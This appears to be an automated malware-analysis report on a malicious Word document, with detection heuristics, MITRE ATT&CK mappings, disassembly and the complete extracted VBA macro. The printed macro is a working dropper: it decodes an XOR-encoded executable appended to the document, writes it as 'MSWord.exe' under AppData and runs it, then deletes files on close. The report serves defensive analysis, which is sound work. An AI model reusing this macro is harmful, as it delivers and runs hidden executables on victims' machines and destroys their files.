MALICIOUS
426
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
T1071.001 Web Protocols
The sample is a malicious OLE document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an attempt to execute commands or scripts. The AutoClose subroutine includes logic to delete files, and the presence of 'SC_STR_WSCRIPT' and 'OLE_VBA_WSCRIPT' heuristics strongly suggests the use of Windows Script Host for malicious purposes, likely to download and execute a secondary payload. The 'SE_ENABLE_LURE' heuristic confirms the document attempts to trick the user into enabling macros.
Heuristics 15
-
ClamAV: Doc.Malware.Miskip-10005013-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Miskip-10005013-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oSh = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FSO = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Folder = Environ("appdata") & "\Microsoft\Word" -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 106,553 bytes but its declared streams total only 59,079 bytes — 47,474 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
x86 disassembly · validity: code (0.904) — 1/1 branch targets land on an instruction boundary (100% coherence)00001A36 40 inc eax 00001A37 40 inc eax 00001A38 40 inc eax 00001A39 40 inc eax 00001A3A 40 inc eax 00001A3B 40 inc eax 00001A3C 40 inc eax 00001A3D 40 inc eax 00001A3E 40 inc eax 00001A3F 40 inc eax 00001A40 40 inc eax 00001A41 40 inc eax 00001A42 40 inc eax 00001A43 40 inc eax 00001A44 40 inc eax 00001A45 40 inc eax 00001A46 40 inc eax 00001A47 40 inc eax 00001A48 40 inc eax 00001A49 40 inc eax 00001A4A 40 inc eax 00001A4B 40 inc eax 00001A4C 40 inc eax 00001A4D 40 inc eax 00001A4E 40 inc eax 00001A4F 40 inc eax 00001A50 40 inc eax 00001A51 40 inc eax 00001A52 40 inc eax 00001A53 40 inc eax 00001A54 40 inc eax 00001A55 40 inc eax 00001A56 40 inc eax 00001A57 40 inc eax 00001A58 40 inc eax 00001A59 40 inc eax 00001A5A 40 inc eax 00001A5B 40 inc eax 00001A5C 40 inc eax 00001A5D 40 inc eax 00001A5E 40 inc eax 00001A5F 40 inc eax 00001A60 40 inc eax 00001A61 40 inc eax 00001A62 40 inc eax 00001A63 40 inc eax 00001A64 40 inc eax 00001A65 40 inc eax 00001A66 40 inc eax 00001A67 40 inc eax 00001A68 ffc4 inc esp 00001A6A 009d00000104 add byte ptr [ebp + 0x4010000], bl 00001A70 0301 add eax, dword ptr [ecx] 00001A72 0100 add dword ptr [eax], eax 00001A74 0000 add byte ptr [eax], al 00001A76 0000 add byte ptr [eax], al 00001A78 0000 add byte ptr [eax], al 00001A7A 0000 add byte ptr [eax], al 00001A7C 0000 add byte ptr [eax], al 00001A7E 0102 add dword ptr [edx], eax 00001A80 03040506070809 add eax, dword ptr [eax + 0x9080706] 00001A87 1000 adc byte ptr [eax], al 00001A89 0103 add dword ptr [ebx], eax 00001A8B 020403 add al, byte ptr [ebx + eax] 00001A8E 0504080306 add eax, 0x6030804 00001A93 05 .byte 0x05 00001A94 0403 add al, 3
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3528 bytes |
SHA-256: 0e9a80518512c4310dfebd50acc67e095300aee20f3374bf770976335e00987f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public File As String
Public Folder As String
Function CheckFile(MacrosArray() As Byte, MacrosSize As Long) As Byte
For I = 0 To MacrosSize - 1
CheckFile = CheckFile Xor MacrosArray(I)
Next I
End Function
Function PresentFile(MacrosArray() As Byte, MacrosSize As Long) As Boolean
Dim VarByte As Byte
VarByte = 35
For I = 0 To MacrosSize - 1
MacrosArray(I) = MacrosArray(I) Xor VarByte
VarByte = ((VarByte Xor 217) Xor (I Mod 256))
Next I
PresentFile = True
End Function
Function ViewDocument() As Boolean
ActiveDocument.GrammarChecked = False
ActiveDocument.SpellingChecked = False
ActiveDocument.Select
Selection.Font.ColorIndex = wdBlack
Selection.HomeKey
ActiveDocument.InlineShapes.Item(1).Width = 110
ActiveDocument.InlineShapes.Item(1).Height = 90
ViewDocument = True
End Function
Sub AutoClose()
On Error Resume Next
Kill File
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.DeleteFile Folder & "\*.*", True
Set FSO = Nothing
End Sub
Sub AutoOpen()
On Error GoTo FalseReturn
ActiveWindow.View.ShowAll = True
ActiveWindow.View.ShowHiddenText = True
Dim ResultView As Boolean
ResultView = ViewDocument()
Dim ThisDocument
Dim DocSize As Long
Dim MacrosSize As Long
Dim MacrosCheck As Byte
DocSize = FileLen(ActiveDocument.FullName)
ThisDocument = FreeFile
Open (ActiveDocument.FullName) For Binary As #ThisDocument
Get #ThisDocument, (DocSize - 4), MacrosCheck
Get #ThisDocument, (DocSize - 3), MacrosSize
If MacrosSize < 8 Then
GoTo FalseReturn
End If
If (MacrosSize + 4) > DocSize Then
GoTo FalseReturn
End If
Dim StartMacros As Long
StartMacros = DocSize - (MacrosSize + 4)
Dim MacrosArray() As Byte
ReDim MacrosArray(MacrosSize - 1)
Get #ThisDocument, StartMacros, MacrosArray
Close #ThisDocument
If Not PresentFile(MacrosArray(), MacrosSize) Then
GoTo FalseReturn
End If
Dim CheckValue As Byte
CheckValue = CheckFile(MacrosArray(), MacrosSize)
If MacrosCheck <> CheckValue Then
GoTo FalseReturn
End If
Folder = Environ("appdata") & "\Microsoft\Word"
Set FSO = CreateObject("Scripting.FileSystemObject")
If Not FSO.FolderExists(Folder) Then
Folder = Environ("appdata")
End If
Set FSO = Nothing
Dim Macros
Macros = FreeFile
File = Folder & "\" & "MSWord.exe"
Open (File) For Binary As #Macros
Put #Macros, 1, MacrosArray
Close #Macros
Erase MacrosArray
Set oSh = CreateObject("WScript.Shell")
oSh.Run File
ActiveDocument.Save
Exit Sub
FalseReturn:
Close #ThisDocument
Close #Macros
ActiveDocument.Save
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.